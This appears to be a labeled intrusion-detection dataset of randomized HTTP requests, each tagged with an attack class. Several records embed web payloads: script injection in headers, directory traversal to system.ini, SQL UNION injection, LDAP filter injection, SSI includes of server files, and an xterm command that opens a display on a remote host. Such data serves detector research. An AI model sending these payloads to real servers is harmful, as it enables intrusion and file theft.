Cookie: osgazerughwcu=nxsxzRHAGbdP;2e=18173305;ah62obctel=tbAJJAfT4zMN
Cookie2: $Version="7"
Date: Mon, 23 Aug 04 20:42:52 GMT
ETag: W/"eRpmRkmZ96ktFwtKx"
Expect: mnteO
From: cI4oaebh@nrntt4iEtl.fr
If-Modified-Since: Sat, 17 Sep 05 02:12:35 CET
If-Unmodified-Since: Mon, 07 Nov 05 15:48:12 CET
If-Match: *
If-None-Match: "1zva9@FNdOT8nIf"
If-Range: "v-lub7Me1IPbwi8kUN"
Max-Forwards: 79
MIME-Version: 9.7
Pragma: est01a=r
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Digest qop=auth-int
Range: -80,3-,-9028
Referer: http://nnTeRws5.st/nsryne4/raxde.jsp
TE: gzip,trailers
Trailer: Via
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 3.7; 4e-eL; rv:3.9.0) Gecko/28608696
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 949x9593
Via: 9.5 www.ahbdsyg.jpeg, FTP/8.3 www.cgge1.css, HTTP/7.7 209.179.94.120
Transfer-Encoding: compress
Upgrade: et3/3.3, etd8ae/9.5
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44488
Start - Id: 46573
class: XSS
GET /4_EQ@68deletevbscript/g@s5Kbfe5Z0Kg_GuD/ee7/Br/amordttqaSohtwoonta/hX_Q.yTI-_H/xeOdetikBtohaoofoeta/t0/onz8wkf_1Fk.jsp?tr=1rlator&old=a4rssiajssiFaeh&ajteieytAmsjr=1B7NCxMFt&yTH10ab6GJ6=Eousns&oeAahgsiairsN3u=acat6ryn+a3wt&au4icEfh9ed6h=e_JWLqgZGgB_&hi9imdotikpzn=rnltl&padMh=cetharhaTemo9crtho&Oeval.@=ipeGin&t22Hddanrmt=teoa%3Eni3%24a&mHgg0stoeheannf=%5Dsben&cnhaetai2e=eqyl&n3hipsmi1eirCt=OnilbsOoem&secn0hrr=1129 HTTP/1.1
Host: www.hang9.biz
Connection: yrhoe
Accept: text/*, application/*, application/x-tar;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: identity
Accept-Language: *;q=0.0
Cache-Control: max-age=71
Client-ip: 140.154.179.232
Cookie: asedevuourst=Eo;RtMeekK=po8urm6fiNacritt
Cookie2: $Version="1"
Date: Thu, 17 Nov 05 12:54:14 GMT
ETag: W/"j-GvuB-Y6UUJL8q3fp"
Expect: oai0tt
If-Modified-Since: Fri, 21 Sep 07 08:57:44 UTC
If-Unmodified-Since: Sun, 27 Jul 08 02:57:14 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Dec 08 10:09:56 UTC
Max-Forwards: 1
MIME-Version: 3.9
Pragma: q1we='mludrnf'
Proxy-Authorization: NTLM ZW5sbjJUbW1uaGhjbUxoY3I1aTR0NmNqZG41b2pzaG55
Authorization: Digest realm
Range: 70-
Referer: /tnnt/eoS6mcr.tar
TE: deflate,trailers,trailers
Trailer: If-Match
User-Agent: <a   href  =   "   about:<s&#99;ript   >[alert   ('mid');]</script  >   " >
UA-CPU: PowerPC
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5605x1554
Via: 1.5 2.25.31.149, 9.3 65.91.116.162, 1.1 18.119.99.179:9
Transfer-Encoding: compress
Upgrade: ieek/6.0, 9suhri/7.2, tEdUn/4.8, nen3O/8.2
Warning: 061 www.jmFttlrn.js "lnQacp2ufeTocbi0I" 
X-Forwarded-For: 222.189.31.195
X-Serial-Number: 70953324571970
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 46573
Start - Id: 36122
class: PathTransversal
GET /fPuagSS._psFpcs/dUdPkVX5fjtTJX/iBz/swesmdaddnwtwzcba7hg/oimwurltfoeiah9diaea/LszfstC8sowecsregTtb/PFRr_KW8/Wgroup byexec0wf.tkfN-Z/5SRmMvAtkH6fRr@nF/a4xF7RVmaz5s8UvWw73I/Z.u3Inph-cRcArh4.r.cfm?wOVpgidAffhY=862690&z-Eboot.iniQconnectp.Jjt=873090702&@gCmnMt=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.0
Host: www.tl4e.be
Connection: tpnh1o
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=2379
Client-ip: 180.199.9.54
Cookie: kto3OqTy.z_=eautoexectrw0delf2andhaopt;ZeH7OiD=eHhs
Cookie2: $Version="645"
Date: Mon, 06 Mar 06 07:57:24 UTC
ETag: "tJMxSUmbHfv8AsK3jw"
Expect: 100-continue
From: dzgo@mzeta.ch
If-Modified-Since: Wed, 18 Feb 09 10:04:32 GMT
If-Unmodified-Since: Sun, 06 Sep 09 14:14:43 UTC
If-Match: "b5e7vsLGQtX1LeaFOqP"
If-None-Match: "0DaHq-f_qTdCAPg"
If-Range: "VKsM3rQokwRGUG5V"
Max-Forwards: 260
MIME-Version: 7.2
Pragma: t=c
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest realm
Range: -984
Referer: /inGwbOD/anpN8afk.shtml
TE: chunked
Trailer: If-Match
User-Agent: nXfTWwDwv http://www.hctd.de
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: 7.7 252.104.64.183, 1.4 www.l4se.gif:413
Transfer-Encoding: gzip
Upgrade: eniw/0.3, sum/7.6, tRyoa/3.2, eolses/1.6
Warning: 482 65.238.5.101 "ois0cbedlccylrNmtRrg" "Sun, 04 Jun 06 04:15:57 GMT"
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 15784658
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36122
Start - Id: 41965
class: SqlInjection
GET /encnraZttcai/9eHumgnt3ltoeVis/olGZ5.bin?om=961743&htcohdTinmidi=%27++++%29+UN%2F**%2FION++++ALL++++SEL%2F**%2FECT+++++%27cmiy%27%2C3706%2C03%2C%27olljhpa%27%2C9+FROM++++eaiauT+++++WHERE+%28%27%27++%3D++%27&sri0oenhpan=08633&Y6UQ=%3Fzexecmt&hi=ne%5Cb%5DeSYahttp+imtxml0&dMarEnemuI=148265&Eyeo8htts0aee3m=anxHXi&jdcb3rsse=g32YbsGig&_div1570PR=fnlfue&oTh5sUUxddpani=cf+&haiossc5ophA=6599 HTTP/1.1
Host: 130.172.195.107:80
Connection: close
Accept: audio/*;q=0.3, video/quicktime;q=0.7, video/quicktime;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: fglQ7ei-oebaiy7;q=0.6
Cache-Control: to8xnlah='foqrh'
Client-ip: 247.194.204.137
Cookie: 9XcBVs@=ebisbaof;7i5ti=scriptarthd
Cookie2: $Version="14"
Date: Sat, 23 Sep 06 23:20:04 GMT
ETag: W/"sjITGmwJxj-3xzcoIS"
Expect: 2eweYa=sefI;hdtn
From: 4zD9@jt6etwau5.be
If-Modified-Since: Mon, 15 Jan 07 20:24:15 UTC
If-Unmodified-Since: Mon, 03 May 10 20:05:42 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 30 Nov 09 20:49:45 UTC
Max-Forwards: 4341
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic czF0OXRvOmtyb3M=
Range: -80
Referer: http://ueqn0Em.cz/beao.asmx
TE: deflate,gzip;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: tabodata (ebtm4-UaeO; fxbYe-W; 6.JfWJ; aGHAxEl5IB)
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1383x317
Via: 2.2 www.4dfrtE.shtml:066
Transfer-Encoding: identity
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41965
Start - Id: 35995
class: PathTransversal
POST /TQ3Ay3Z/qt/Elib2Vm1OY/yXD/0Gp0IVSXHf6knrpE/d6e7usrIyprdig/awN2er2celaotiohh/tfiaawh9tqiht/aIKPK5h-95xb5dsw/rat4.swf? HTTP/1.0
Content-Length: 188
Content-Language: nbnnwmws,2yidn
Content-Encoding: deflate
Content-Location: /texitaa3/kmmh/scrte9e/8ytflfx/bl7zrnkw.tar.gz
Content-MD5: b3ROZWdvaWloM1JlYWhiZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Dec 05 20:24:51 CET
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: www.wfblhadosc.gov
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tOgd3-idlaeOlF;q=0.1, zEen0z-NiT2ye, d4rnc1-C;q=0.5, oupt-r
Cache-Control: only-if-cached
Client-ip: 11.175.85.5
Cookie: e5=D3c;irww=49;GEheawl=876090;ohl5=n2/tt
Cookie2: $Version="232"
Date: Tue, 23 Mar 10 14:24:14 CET
ETag: W/"BlYWiXEeTeQyj4LLGp5t"
Expect: 100-continue
From: rA7tR@tqia61e.ch
If-Modified-Since: Thu, 10 Aug 06 10:39:54 UTC
If-Unmodified-Since: Wed, 17 Aug 05 07:16:56 GMT
If-Match: *
If-None-Match: *
If-Range: "YXj6n8rGAu961oxED"
Max-Forwards: 9
MIME-Version: 5.1
Pragma: yiene3ai='roxtNSns'
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Authorization: Basic dHR0NGNvdTptZG9EZHl1
Range: 799-,4-,-692713
Referer: /I3nr/ni0olse/6ipsoaOc/tixym/4hE4o.css
TE: chunked,trailers,chunked
Trailer: Accept-Encoding
User-Agent: 8thw4eumrqrNnihaeut
UA-OS: Win98
UA-Pixels: 551x993
Via: HTTP/9.1 www.lky8sso.jpg
Transfer-Encoding: compress
Upgrade: uUi/7.8, eeds/2.6, Myede/4.4
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 133.228.168.254
~~~~~: ~~~~~~~~~~~~~~~~~~~~

fknjeo=lnretit<t&dssNho2pjocnaah=eieredatnshT&2xq9rT=637499554&3VNQuG-2=fsenay9oe&rye=eeoaw14e&eountnTron=eam&0mzcnscggbia=..\..\..\..\..\..\..\..\..\WINNT\system.ini

End - Id: 35995
Start - Id: 44640
class: PathTransversal
GET /0asA/warkk.sh?yC=7&tsjdtanwGhrn=lm%40z&scriptwR29Ochild=group+bynu%2B%5BincludeHmtyltu&oathi=jNpSQi5&ra=du%26&hblasennmtHtR=%29hee&inf=2911083695&fyo1ekpt=nooulsrsdi%25ttee&ogoaoaoaz=7G.M-0E2UA HTTP/1.0
Host: 27.190.126.141:80
Connection: gftkex
Accept: */*;q=0.3
Accept-Charset: windows-1252;q=0.5, x-mac-greek;q=0.2
Accept-Encoding: collection(   file:///c:/oi5oa/lnd1w.xml)
Accept-Language: *
Cache-Control: etait='fe'
Client-ip: 223.244.181.80
Cookie: eol1ahne9vna=8772435359;Sautoexec5N9qRihttps2=2splrbOtirliie;ttGuseOzn=054
Cookie2: $Version="302"
Date: Mon, 23 Jun 08 24:04:45 CET
ETag: "dpXSh8Z-yIwmS16F7"
Expect: rz4nngt=9nmgu;Xsnsdc
From: sene@eakbEa.biz
If-Modified-Since: Wed, 27 Jul 05 17:02:32 UTC
If-Unmodified-Since: Fri, 27 Oct 06 09:39:01 GMT
If-Match: "c8nyu5f-EP2w_MYaNj"
If-None-Match: "lOUelim3oQA0_J5r3yr0"
If-Range: Mon, 20 Jun 05 14:28:53 CET
Max-Forwards: 97
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest qop=2nwtea
Authorization: lidz eaeEa=4rennsEc
Range: -91317,1-,143349-680394
Referer: /uetzd9m.jsp
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/9.0 (X11; U; Solaris 4.6; cp-th; rv:4.6.7) Gecko/24299105
UA-CPU: x86
UA-Disp: 570,026,32
UA-OS: FreeBSD
UA-Color: color8
Via: ohseb/1.4 8.250.225.67, 6.6 www.ihgsu.tiff:6217
Transfer-Encoding: identity
Upgrade: li4Qh/6.8
X-Serial-Number: 78282419724364681
----: -------------------------

null

End - Id: 44640
Start - Id: 38812
class: LdapInjection
GET /3dsSE.pl?imglra7=6ztTnetcatoteailt&cea=dlAt%29%28%26%28objectClass++%3D+sawn*%29 HTTP/1.0
Host: 198.63.107.130
Connection: foatIco
Accept: */*
Accept-Charset: x-mac-arabic;q=0.5, windows-1254
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.3
Cache-Control: max-stale=04
Client-ip: 103.147.207.153
Cookie: mtcmRaaoei=068;usvtndigr2ehmLo=enggrmr3didmz;pD=74870294;542Ucusr=wtnoi5etzgi7;feygo=991661
Cookie2: $Version="19"
Date: Fri, 23 Jun 06 14:40:45 UTC
ETag: "954BYt15GW0-QKluibg"
Expect: stgenha=alean
From: r5dntkrl@nt5eetn.it
If-Modified-Since: Thu, 15 Nov 07 10:00:42 UTC
If-Unmodified-Since: Sat, 24 Apr 10 09:46:22 UTC
If-Match: "BBzvbA@EGFRS6a983x7"
If-None-Match: *
If-Range: Sun, 17 Aug 08 14:03:29 GMT
Max-Forwards: 199
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: NTLM bWgxaWNpbXFuYWFkbXRvbHRoZU9uaVNqbGlyZWhFbmV0Y3hsb2V0dGlZMnh1
Range: 65399-30
Referer: /rnnuqhri/asrr/1rcx/sstdsu/b1re.php
TE: deflate;q=0.3,trailers
Trailer: Pragma
User-Agent: ttxatfeo (gD6QS07; tID_sjnh.; s6EAStPg; shZDGd; rZnioB)
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: 6.4 www.aaiarxez.png:8, HTTP/9.9 www.s2pli.png, 7.3 200.115.93.220:755
Transfer-Encoding: deflate
Upgrade: nnttd/5.1, egt/5.4, hhil/2.6, yoxamn/4.2, errtdt/4.7
Warning: 023 39.150.229.95 "eattAsOfe" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38812
Start - Id: 39473
class: SSI
PUT /U8nconnectvJIeNFRB/ttdmlz1atA2isTothpcw.css? HTTP/1.1
Content-Length: 147
Content-Language: annio
Content-Encoding: gzip
Content-Location: /Inlo/aetmR.swf
Content-MD5: ZXZlSGV0b2lwcFN0Rm9lbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 May 08 21:02:35 GMT
Last-Modified: Fri, 22 Aug 08 21:11:03 UTC
Host: 143.81.182.16
Connection: close
Accept: application/*, audio/basic
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: irt-lwmtt, oi9-pgt, astneoS-tpuortah;q=0.2, oeh-e;q=0.4, mt9t-ufuva;q=0.5
Cache-Control: no-store
Client-ip: 81.231.57.32
Cookie: nccnaotwltlp1s=39414;oO=3;ctolIaa=Sh)cfroma;arnyozetnv=tit64hd664to;am=si8tdi7;hCSallVl5ol8d=img 
Cookie2: $Version="806"
Date: Wed, 01 Apr 09 19:50:24 GMT
ETag: "-pMwXMm-ubda_noYXj"
Expect: Efvkeonb=egfred
From: zO5ldjrt@WIls.cz
If-Modified-Since: Tue, 10 Jun 08 03:43:18 GMT
If-Unmodified-Since: Fri, 25 Nov 05 12:14:41 GMT
If-Match: "4tUhl.@ZykD3z7Z"
If-None-Match: *
If-Range: "eUBKF3H5UHgaN1xabUxc"
Max-Forwards: 5
Pragma: no-cache
Proxy-Authorization: NTLM c3JuaGxyRWR4b3R1aWh0cmFnd2FlYXQxVGRudG9yb3llZGxFc21vZGo2cA==
Authorization: lgnId auko43=Swctiz
Range: 7116-024
Referer: /Wxk8r/ea1eN.php
User-Agent: <!--#email fromhost="www.ue2sah.com" tohost="mailbox.syVln.com" message="enebLs spAlEns TeeWrwes n0tRO" fromaddress="tuydmc.com" toaddress="iTruL.wcCD5n.com" subject="0" sender="dAe.com" replyto="gnelsgl.com" cc="sfl" inreplyto="dt Ehg utas" id="staapmail" -->
UA-CPU: Sparc
UA-Pixels: 8114x0121
Via: 2.2 157.138.84.63, 0.7 152.187.75.57, FTP/5.0 www.EelU.png
X-Forwarded-For: 255.162.171.217
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nehe=389&PnacpHosulsinh=355&xg9rab=2333&@2usrGOJssander=rFlJCH_&ad5nd1rassm6eye=positionl=(]bqy;a&nrrsaa3tjz=me8ls&oHrBfaU=813&ol98=4599121

End - Id: 39473
Start - Id: 39821
class: SSI
GET /meneaeamtn0tnr/fVzY1divu004M50_/ItvhHewdmhrnxezt/zgAzX7/obaFFd/lugaaampRukstgmb4tp/rraetccddyRoutmwneu8/0PHDXUCBO@/ezmsEALcE-suGF/nsUBtaNMYf5qSvYCUL/i9fQQapYbKBt-9r_.php?nnlir=755672&cjrdrop1o2_2a72=%3C%21--++++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&oVg5=2&Ih5CUTHjy=ai3hRa-83%40V2&aodndt=sock_streamloF&om9zdsmnu0l4q=g&PAGHzB=5613&0ilittsjOst=n50ttelnet&egphdhl=83 HTTP/1.1
Host: 240.149.213.60:738
Connection: keep-alive
Accept: audio/basic, text/html, audio/basic
Accept-Charset: *
Accept-Encoding: identity;q=0.4, identity;q=0.3, compress, compress;q=0.7, deflate;q=0.5
Accept-Language: xdd-cuh;q=0.5, izftbt-Uedqe0yh, emay9-ren1e, app-ms0i, 7acugi-ia
Cache-Control: max-stale=77203
Client-ip: 179.116.196.3
Cookie: oLUxconnectnetcat4Xbgsoundcbj=3l7zjRB-fP3;SSseg8pe2K=379;9ho5sietoT=$bhonufuflr setolaccepto;hkOscriptjZo=665
Cookie2: $Version="15"
Date: Thu, 22 Sep 05 15:22:09 UTC
ETag: "nh-L3-xB8cm82HcCivd"
Expect: rsGesn
From: fEkbo16t@uycIttryA.biz
If-Modified-Since: Sun, 05 Nov 06 19:33:22 UTC
If-Unmodified-Since: Sat, 01 Nov 08 02:31:46 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Jun 06 10:06:57 CET
Max-Forwards: 8955
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic aWJlejJFUGk6dWVibGV3
Authorization: taxs reahho=t9eaicne
Range: 40-,-909,-0651
Referer: http://rehftoe.biz/lryieqt.bin
TE: trailers,gzip,trailers
Trailer: Accept-Encoding
User-Agent: uv-Kxl http://www.c5tiet.st
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9632x079
Via: 9.4 232.33.104.2, FTP/0.7 87.1.80.182:9
Transfer-Encoding: tu4uso; eqsoos=ctau
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 728 www.6meT.htm "tbadlt3aeEaT" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 408744625517883
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39821
Start - Id: 38438
class: LdapInjection
GET /uoO@_WxUj8n/rv00heC/an1yEreUrTsusmuoeaos/tleonen7irelpaAr/eoeirotitEnepeo.php?qleerelepn2tmnp=n3d&dyq9adhfwacdfrT=n&I1boot.inidijzH=metada%3Bsam+ttTndcrcihautoexecH&9mF=ptlrSfooa6e7eh&nDFQcopyDDOEcFR=sblike&1anBteiwehCdck=219%29%28%26%28objectClass%3Dtire%29%28%7C%28sn%3D++++tmsE%29%28cn%3Dsw+++J*%29%29 HTTP/1.1
Host: 182.24.221.17
Connection: pL8mugt
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, compress;q=0.8, deflate, gzip;q=0.1, deflate
Accept-Language: oc-7, re-eynhiNtm
Cache-Control: no-cache
Client-ip: 91.250.232.64
Cookie: mD6qk=hiNeeals5hew;91Hs76aa5=0arua23yQtslth8;ufg5saanhEcsmac=62vN;utpAcjuezss=50718;koiigekoawt=r/sock_streamhipwoIn;iawn7r2hEOf=5621123
Cookie2: $Version="1"
Date: Sat, 04 Jun 05 10:57:01 UTC
ETag: W/"MNBe@AaItOgnq@C3GcyN"
Expect: a8zE262
From: bleovs1n@HWots.com
If-Modified-Since: Sat, 11 Aug 07 02:04:04 UTC
If-Unmodified-Since: Sat, 25 Apr 09 16:01:15 GMT
If-Match: "lYDjuaJTlLKJXd0A47"
If-None-Match: *
If-Range: *
Max-Forwards: 3359
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest username="aSaCs"
Range: 722-
Referer: /daTthBTt.pdf
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/9.8 (Machintosh; U; PPC Mac OS X 8.5; dk-0g; rv:8.5.9) Gecko/51178218
UA-CPU: 68000
UA-Disp: 6654,995,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 040x944
Via: 8.9 15.5.121.42
Transfer-Encoding: compress
Upgrade: lig/4.2, roeri/4.4
Warning: 002 214.157.156.89:632 "8yEitwPEhweiynae" "Mon, 24 Nov 08 09:49:08 CET"
X-Forwarded-For: 62.19.165.119
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38438
Start - Id: 45225
class: PathTransversal
GET ////? HTTP/1.0
Host: www.emoe6u.be
Connection: hmiSoooo
Accept: image/gif;q=0.1, audio/basic;q=0.6, audio/x-wav
Accept-Charset: x-mac-chinesetrad;q=0.0
Accept-Encoding: *
Accept-Language: 8-2evoncj;q=0.0, eliti-6ylz
Cache-Control: nvheztn=sHr
Client-ip: 98.132.36.144
Cookie: co2toe1=so
Cookie2: $Version="85"
Date: Sun, 28 Dec 08 19:36:00 CET
ETag: "-qcabPpgplrjvLIQhRqC"
Expect: hslN
From: sgrttcno@xhaofa.gov
If-Modified-Since: Sun, 09 Apr 06 13:49:28 CET
If-Unmodified-Since: Mon, 10 Apr 06 05:19:14 CET
If-Match: "8NKHrVu-PltzuDw"
If-None-Match: "XN0oZG0JMiw5tKi5RR_"
If-Range: "sMdrYFbvp5ulpst3DN"
Max-Forwards: 42
MIME-Version: 3.6
Pragma: a2tot=rebrch
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM bHJkZThpb3djQXJnYWFpYnlCbzRkdHdhbmVsdWNlbzJ3cEluem9ic3FmaGNtaHc=
Range: -01750,762-,10389-0
Referer: http://tsa8l.ch/thl0ms/tlorll.avi
TE: trailers,chunked;q=0.2,trailers
Trailer: Expect
User-Agent: Mozilla/9.6 (Windows; U; WinNT 2.7; aR-rE; rv:4.2.6) Gecko/53177633
UA-CPU: x86
UA-Disp: 675,5988,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: 9.4 150.248.201.188, 5.6 179.191.146.1
Transfer-Encoding: deflate
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 90.180.246.61
X-Serial-Number: 706890452941318
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45225
Start - Id: 36707
class: OsCommanding
PUT /Eo/bFPSbKwo6KvrJkUJsbb/q@9L037QhOe/1h0uaetrdi8yoLXxp/en0ageeEeeagH2em/tajXoPBccAvG2aVUYuH/Xq.htm? HTTP/1.0
Content-Length: 168
Content-Language: qnb,gc,mneBr8
Content-Encoding: compress
Content-Location: http://www.0etm.gov/Hciit/e8Eajr/hlrt/e1neCo.pdf
Content-MD5: Y29VZXZjdWFhbmpzdFh2ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 May 05 02:24:07 UTC
Last-Modified: Thu, 01 Feb 07 08:19:32 GMT
Host: 23.181.124.1
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 24.6.250.56
Cookie: hsontdreTAmirac=rhab0Oo;1sl9so1rb=scripthihragh9i+mts;rWY@mLperlhnK=y%ecmd;rnnmirRlfet=1208
Cookie2: $Version="18"
Date: Fri, 10 Aug 07 21:19:57 CET
ETag: W/"LE7CRa2rOJ_8Ht@xs8X"
Expect: ihu8
From: eralt@eApeeioers.de
If-Modified-Since: Tue, 08 Jun 04 08:27:00 CET
If-Unmodified-Since: Mon, 24 Sep 07 15:44:56 GMT
If-Match: *
If-None-Match: "r9M_gIUh-jKg3lHOmA"
If-Range: Tue, 09 Feb 10 24:01:39 UTC
Max-Forwards: 5
MIME-Version: 4.5
Pragma: i3=lw1n
Proxy-Authorization: ssrr uentet=otetm
Authorization: Basic TmJzVGRzOmVrcW9weWU=
Range: 426198-
Referer: http://www.eR2sfrml.cz/eaie.png
TE: chunked;q=0.4
Trailer: Pragma
User-Agent: g.e8RRnD7 http://www.ndmtsl1.com
UA-CPU: StrongARM
UA-Disp: 1584,454,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 654x545
Via: 4.1 103.13.239.247:58, 5.5 243.209.170.218, FTP/5.5 www.55gtdent.shtml:1781
Transfer-Encoding: identity
Upgrade: omsr/2.0, rxspop/7.7, osEh/6.9
X-Forwarded-For: 3.19.153.226
X-Serial-Number: 56753790065108318
----: -------------------------

itgi6sefesmrgEr=pedivBqea7ailngubin&8nhjD0_3M=izerLswioehliyne&uooentooia=roaTgenseiPedm&jgteanaa=tfotrgw1sisiDS&yoah=%0A    xterm   -display  www.oristatr.com:0.0 

End - Id: 36707
Start - Id: 40664
class: SSI
GET /EUp.jpeg?n6ars=%3C%21--%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&etad=80834&9i89rAfszulex=5wztonshmne&hu6wToe=54668491&daailoeltia=haeorq9jrcpeimreE&ronDeartcLm=et%26zndte%24T HTTP/1.1
Host: www.ril43.gov
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-arabic;q=0.9, x-mac-turkish;q=0.3, iso-8859-8-i, x-mac-chinesetrad;q=0.7, utf-7;q=0.3
Accept-Encoding: *
Accept-Language: asccerhi-aEL;q=0.7, Caln-acs, ntodatas-ue;q=0.8, hNcssSr-Tfcdeuc9
Cache-Control: no-store
Client-ip: 248.142.217.61
Cookie: nocmsIas2rn=912324
Cookie2: $Version="0"
Date: Sun, 10 Oct 04 04:32:17 CET
ETag: W/"Q6J6OIeUtDDNbaVKZeC"
Expect: 100-continue
From: 4dtnvda@6tnlilE.st
If-Modified-Since: Thu, 06 Nov 08 15:28:25 GMT
If-Unmodified-Since: Tue, 06 Nov 07 04:34:22 GMT
If-Match: *
If-None-Match: *
If-Range: "AP8RDf49SQaPlHZybGzp"
Max-Forwards: 2
MIME-Version: 9.9
Pragma: sl=nG
Authorization: Basic dzhuOXRvOnRsZTFsOWw=
Referer: http://etafosc.fr/auaO/fH2aem/snape/swMtIc/msspjdtt.mdb
TE: trailers
Trailer: If-Range
User-Agent: elivgQnfB http://www.HuUmtraa.com
UA-CPU: MIPS
UA-Disp: 7385,808,16
UA-Color: color32
Via: e8sord/7.3 www.s9nrlLgi.tiff, ayanoe/8.2 181.132.36.103
Transfer-Encoding: olnood
Upgrade: pcv/3.4, ah5lez/2.2, ANae/5.6
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 9147662078106
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40664
Start - Id: 36873
class: LdapInjection
GET /k6iGMQcMnU-8a1ALY-/er2kb7@L8GeyRFm5O/mNGOL3bKM5UK5CZ7/stdinfH.1ElGAMJall/r9tNutfYvirhNoh/CHnodeJp0Tn1XbN/yPM9zWysock_streamIoXIZ.shtml?EhOGQ=l8he&3h2ndhwuwr7sDsu=0122&kyhrmgda=8162&S@LF11SqS=ieautoexeckv%3BoETht6ho9&eCe7eeo=f1YW HTTP/1.0
Host: www.yuam.cz
Connection: m6in
Accept: application/*, image/*, audio/*;q=0.0
Accept-Charset: windows-874
Accept-Encoding: *;q=0.3
Accept-Language: e-fhr;q=0.4, U3e-yn75nl7;q=0.6, oosrAi-es0eoyth
Cache-Control: max-age=495
Cookie: 8XjPAh5UUY6o=oa;KiyEqa=fnlaor;sieFexoIn5eqi=iframelidzr;UhytAnmNe=)   (  |    (  cn=*o   'brien*  )(mail  =*o  'brien*  )
Date: Mon, 27 Nov 06 02:20:56 CET
If-Match: "Mc_Q5-zKq3LKhC8wN4"
If-Range: Tue, 14 Aug 07 10:00:22 UTC
Max-Forwards: 9813
Pragma: no-cache
Proxy-Authorization: NTLM dWh0dHllbWw3b2lmZWUxZUQ4YW51Z09zbkh1SWVhOHRlaQ==
